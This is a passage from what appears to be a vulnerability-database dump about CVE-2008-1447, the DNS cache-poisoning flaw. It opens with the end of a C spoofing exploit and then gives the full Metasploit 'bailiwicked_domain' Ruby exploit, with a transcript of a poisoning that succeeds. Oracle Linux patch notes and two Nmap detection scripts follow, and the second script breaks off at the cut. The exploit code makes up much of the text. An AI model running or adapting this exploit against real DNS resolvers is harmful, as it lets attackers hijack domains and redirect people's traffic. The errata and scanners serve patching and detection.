<domain> NS <subhost>.<domain>\n // - 1 additional record: <subhost>.<domain> A <any-ip>\n snprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain);\n unsigned r;\n for (r = 0; r < replies; r++)\n {\n // use a txid that is just 'r': 0..(replies-1)\n len = build_response(buf, ip_authoritative, ip_resolver,\n port_resolver, r, name, \"1.1.1.1\", domain, ns, anyip);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n }\n cnt++;\n }\n ip_close(iph);\n return 0;\n}\n\n// milw0rm.com [2008-07-25]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "edition": 1, "published": "2008-07-23T00:00:00", "title": "BIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-23T00:00:00", "id": "EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D", "href": "", "sourceData": " ____ ____ __ __\n / \\ / \\ | | | |\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\n | | | |__| | | | | |\n | | ___ | __ | | | | |\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\n \\____/ |__| |__| \\______/\n \n Computer Academic Underground\n http://www.caughq.org\n Exploit Code\n\n===============/========================================================\nExploit ID: CAU-EX-2008-0003\nRelease Date: 2008.07.23\nTitle: bailiwicked_domain.rb\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains\nTested: BIND 9.4.1-9.4.2\nAttributes: Remote, Poison, Resolver, Metasploit\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt\nAuthor/Email: I)ruid <druid (@) caughq.org>\n H D Moore <hdm (@) metasploit.com>\n===============/========================================================\n\nDescription\n===========\n\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\nwhich allow the insertion of malicious DNS records into the cache of the\ntarget nameserver. This exploit caches a single malicious nameserver\nentry into the target nameserver which replaces the legitimate\nnameservers for the target domain. By causing the target nameserver to\nquery for random hostnames at the target domain, the attacker can spoof\na response to the target server including an answer for the query, an\nauthority server record, and an additional record for that server,\ncausing target nameserver to insert the additional record into the\ncache. This insertion completely replaces the original nameserver\nrecords for the target domain.\n\n\nExample\n=======\n\n# /msf3/msfconsole\n\n ## ### ## ##\n ## ## #### ###### #### ##### ##### ## #### ######\n####### ## ## ## ## ## ## ## ## ## ## ### ##\n####### ###### ## ##### #### ## ## ## ## ## ## ##\n## # ## ## ## ## ## ## ##### ## ## ## ## ##\n## ## #### ### ##### ##### ## #### #### #### ###\n ##\n\n\n =[ msf v3.2-release\n+ -- --=[ 298 exploits - 124 payloads\n+ -- --=[ 18 encoders - 6 nops\n =[ 73 aux\n\nmsf > use auxiliary/spoof/dns/bailiwicked_domain\nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D\nRHOST => A.B.C.D\nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com\nDOMAIN => example.com\nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com\nNEWDNS => dns01.metasploit.com\nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0\nSRCPORT => 0\nmsf auxiliary(bailiwicked_domain) > check\n[*] Using the Metasploit service to verify exploitability...\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\nb.iana-servers.net.\na.iana-servers.net.\n\nmsf auxiliary(bailiwicked_domain) > run\n[*] Switching to target port 50391 based on Metasploit service\n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com\n[*] Querying recon nameserver for example.com.'s nameservers...\n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.\n[*] Querying recon nameserver for address of b.iana-servers.net....\n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236\n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....\n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.\n[*] Querying recon nameserver for address of a.iana-servers.net....\n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43\n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....\n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...\n[*] Sent 1000 queries and 20000 spoofed responses...\n[*] Sent 2000 queries and 40000 spoofed responses...\n[*] Sent 3000 queries and 60000 spoofed responses...\n[*] Sent 4000 queries and 80000 spoofed responses...\n[*] Sent 5000 queries and 100000 spoofed responses...\n[*] Sent 6000 queries and 120000 spoofed responses...\n[*] Sent 7000 queries and 140000 spoofed responses...\n[*] Sent 8000 queries and 160000 spoofed responses...\n[*] Sent 9000 queries and 180000 spoofed responses...\n[*] Sent 10000 queries and 200000 spoofed responses...\n[*] Sent 11000 queries and 220000 spoofed responses...\n[*] Sent 12000 queries and 240000 spoofed responses...\n[*] Sent 13000 queries and 260000 spoofed responses...\n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com\n[*] Auxiliary module execution completed\n\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\ndns01.metasploit.com.\n\n\nCredits\n=======\n\nDan Kaminsky is credited with originally discovering this vulnerability.\n\nCedric Blancher <sid (@) rstack.org> figured out the NS injection method and \nwas cool enough to email us and share!\n\n\nReferences\n==========\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\nhttp://www.kb.cert.org/vuls/id/800113\n\n\nMetasploit\n==========\n\nrequire 'msf/core'\nrequire 'net/dns'\nrequire 'scruby'\nrequire 'resolv'\n\nmodule Msf\n\nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary\n\n\tinclude Exploit::Remote::Ip\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t'Name' => 'DNS BailiWicked Domain Attack',\n\t\t\t'Description' => %q{\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \n\t\t\t\tDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target\n\t\t\t\tdomains nameserver entries in a vulnerable DNS cache server. This attack works\n\t\t\t\tby sending random hostname queries to the target DNS server coupled with spoofed\n\t\t\t\treplies to those queries from the authoritative nameservers for that domain.\n\t\t\t\tEventually, a guessed ID will match, the spoofed packet will get accepted, and\n\t\t\t\tthe nameserver entries for the target domain will be replaced by the server\n\t\t\t\tspecified in the NEWDNS option of this exploit.\n\t\t\t},\n\t\t\t'Author' => \n\t\t\t\t[ \n\t\t\t\t'\tI)ruid', 'hdm',\n\t\t\t\t\t #\n\t\t\t\t\t'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method \n\t\t\t\t\t # and was cool enough to email us and share!\n\t\t\t\t\t #\n\t\t\t\t],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t'Version' => '$Revision: 5591 $',\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],\n\t\t\t\t],\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\n\t\t\t))\n\t\t\t\n\t\t\tregister_options(\n\t\t\t\t[\n\t\t\t\t\tOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]),\n\t\t\t\t\tOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),\n\t\t\t\t\tOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),\n\t\t\t\t], self.class)\n\t\t\t\t\t\n\tend\n\t\n\tdef auxiliary_commands\n\t\treturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" }\n\tend\n\n\tdef cmd_check(*args)\n\t\ttarg = args[0] || rhost()\n\t\tif(not (targ and targ.length > 0))\n\t\t\tprint_status(\"usage: check [dns-server]\")\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"Using the Metasploit service to verify exploitability...\")\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => targ,\n\t\t\t'PeerPort' => 53\n\t\t)\t\t\n\n\t\trandom = false\n\t\tports = []\n\t\tlport = nil\n\t\t\n\t\t1.upto(5) do |i|\n\t\t\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\n\t\t\t\t\t\tprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\")\n\t\t\t\t\t\tt_port = t_port.to_i\n\t\t\t\t\t\tif(lport and lport != t_port)\n\t\t\t\t\t\t\trandom = true\n\t\t\t\t\t\tend\n\t\t\t\t\t\tlport = t_port\n\t\t\t\t\t\tports << t_port\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\t\t\n\t\tsrv_sock.close\n\t\t\n\t\tif(ports.length < 5)\n\t\t\tprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif(random)\n\t\t\tprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\")\n\t\t\tprint_status(\" This server may still be exploitable, but not by this tool.\")\n\t\telse\n\t\t\tprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\")\n\t\tend\n\tend\n\t\t\n\tdef run\n\t\ttarget = rhost()\n\t\tsource = Rex::Socket.source_address(target)\n\t\tsport = datastore['SRCPORT']\n\t\tdomain = datastore['DOMAIN'] + '.'\n\t\tnewdns = datastore['NEWDNS']\n\t\trecons = datastore['RECONS']\n\t\txids = datastore['XIDS'].to_i\n\t\tnewttl = datastore['TTL'].to_i\n\t\txidbase = rand(20001) + 20000\n\t\t\n\t\taddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\")\n\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => target,\n\t\t\t'PeerPort' => 53\n\t\t)\n\n\t\t# Get the source port via the metasploit service if it's not set\n\t\tif sport.to_i == 0\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\t\t\t\t\t\tsport = t_port.to_i\n\n\t\t\t\t\t\tprint_status(\"Switching to target port #{sport} based on Metasploit service\")\n\t\t\t\t\t\tif target != t_addr\n\t\t\t\t\t\t\tprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\")\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\t# Verify its not already poisoned\n\t\tbegin\n\t\t\tquery = Resolv::DNS::Message.new\n\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\tquery.rd = 0\n\n\t\t\tbegin\n\t\t\t\tcached = false\n\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\n\n\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\n\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\tt = Time.now + ttl\n\t\t\t\t\t\t\tprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\")\n\t\t\t\t\t\t\tprint_status(\" Cache entry expires on #{t.to_s}\")\n\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\tend\n\t\t\tend until not cached\n\t\trescue ::Interrupt\n\t\t\traise $!\n\t\trescue ::Exception => e\n\t\t\tprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\tend\n\n\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\n\n\t\tprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\"\n\n\t\t# Look up the nameservers for the domain\n\t\tprint_status \"Querying recon nameserver for #{domain}'s nameservers...\"\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\n\t\t#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\"\n\n\t\tbarbs = [] # storage for nameservers\n\t\tanswer0.answer.each do |rr0|\n\t\t\tprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\"\n\t\t\tif rr0.type == 'NS'\n\t\t\t\tprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\"\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\n\t\t\t\t#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\"\n\t\t\t\tanswer1.answer.each do |rr1|\n\t\t\t\t\tprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\"\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \n\t\t\t\t\tprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\"\n\t\t\t\t\tanswer2 = res2.send(domain)\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\n\t\t\t\t\t\tbarbs << nsrec\n\t\t\t\t\t\tprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\"\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\n\t\tif barbs.length == 0\n\t\t\tprint_status( \"No DNS servers found.\")\n\t\t\tsrv_sock.close\n\t\t\tdisconnect_ip\n\t\t\treturn\n\t\tend\n\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\n\t\tqueries = 0\n\t\tresponses = 0\n\n\t\tconnect_ip if not ip_sock\n\n\t\tprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\")\n\n\t\twhile true\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname\n\n\t\t\t# Send spoofed query\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\treq.id = rand(2**16)\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\n\n\t\t\treq.rd = 1\n\n\t\t\tbuff = (\n\t\t\t\tScruby::IP.new(\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\n\t\t\t\t\t:src => source,\n\t\t\t\t\t:dst => target,\n\t\t\t\t\t:proto => 17\n\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\n\t\t\t\t\t:dport => 53\n\t\t\t\t)/req.encode\n\t\t\t).to_net\n\t\t\tip_sock.sendto(buff, target)\n\t\t\tqueries += 1\n\t\t\t\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\n\t\t\treq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\n\t\t\treq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))\n\t\t\treq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored\n\t\t\treq.qr = 1\n\t\t\treq.aa = 1\n\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\n\t\t\t\treq.id = id\n\t\t\t\tbarbs.each do |barb|\n\t\t\t\t\tbuff = (\n\t\t\t\t\t\tScruby::IP.new(\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\n\t\t\t\t\t\t\t:dst => target,\n\t\t\t\t\t\t\t:proto => 17\n\t\t\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t\t\t:sport => 53,\n\t\t\t\t\t\t\t:dport => sport.to_i\n\t\t\t\t\t\t)/req.encode\n\t\t\t\t\t).to_net\n\t\t\t\t\tip_sock.sendto(buff, target)\n\t\t\t\t\tresponses += 1\n\t\t\t\tend\n\t\t\tend\n\n\t\t\t# status update\n\t\t\tif queries % 1000 == 0\n\t\t\t\tprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\")\n\t\t\tend\n\n\t\t\t# every so often, check and see if the target is poisoned...\n\t\t\tif queries % 250 == 0 \n\t\t\t\tbegin\n\t\t\t\t\tquery = Resolv::DNS::Message.new\n\t\t\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\t\t\tquery.rd = 0\n\t\n\t\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\t\tanswer, addr = srv_sock.recvfrom()\n\n\t\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\t\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\t\tprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\")\n\t\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\trescue ::Interrupt\n\t\t\t\t\traise $!\n\t\t\t\trescue ::Exception => e\n\t\t\t\t\tprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\t\t\tend\n\t\t\tend\n\n\t\tend\n\n\tend\n\nend\nend\t\n\n# milw0rm.com [2008-07-23]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "[2.45-1.el5.1]\n- update to new upstream version\n- fixes for CVE-2008-1447/CERT VU#800113\n- Resolves: rhbz#454869", "edition": 4, "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "ELSA-2008-0789", "href": "http://linux.oracle.com/errata/ELSA-2008-0789.html", "title": "dnsmasq security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "bind: \n[9.3.4-6.0.1.P1]\n- CVE-2008-1447\nselinux-policy:\n[2.4.6-137.1]\n- Allow named to bind to any udp port\nResolves: #451971", "edition": 4, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "ELSA-2008-0533", "href": "http://linux.oracle.com/errata/ELSA-2008-0533.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:55", "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the porttest server. In addition your IP address will be sent along with the porttest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-srcport <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 7, "published": "2008-11-06T02:52:59", "title": "dns-random-srcport NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-SRCPORT.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-srcport.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-port recursion vulnerability.\nPredictable source ports can make a DNS server vulnerable to cache poisoning\nattacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/porttest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the porttest\nserver. In addition your IP address will be sent along with the\nporttest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\nporttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-srcport <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n-- This script uses (with permission) Duane Wessels' porttest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbeef\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: porttest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xbe, 0xef, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"porttest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. \"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xbe\n or string.byte(result, 2) ~= 0xef) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T17:05:16", "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition your IP address will be sent along with the txidtest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-txid <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 3, "published": "2008-11-06T02:52:59", "title": "dns-random-txid NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-TXID.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-txid.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-TXID DNS recursion\nvulnerability. Predictable TXID values can make a DNS server vulnerable to\ncache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/txidtest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the txidtest\nserver. In addition your IP address will be sent along with the\ntxidtest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\ntxidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-txid <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n-- This script uses (with permission) Duane Wessels' txidtest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbabe\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: txidtest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xba, 0xbe, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 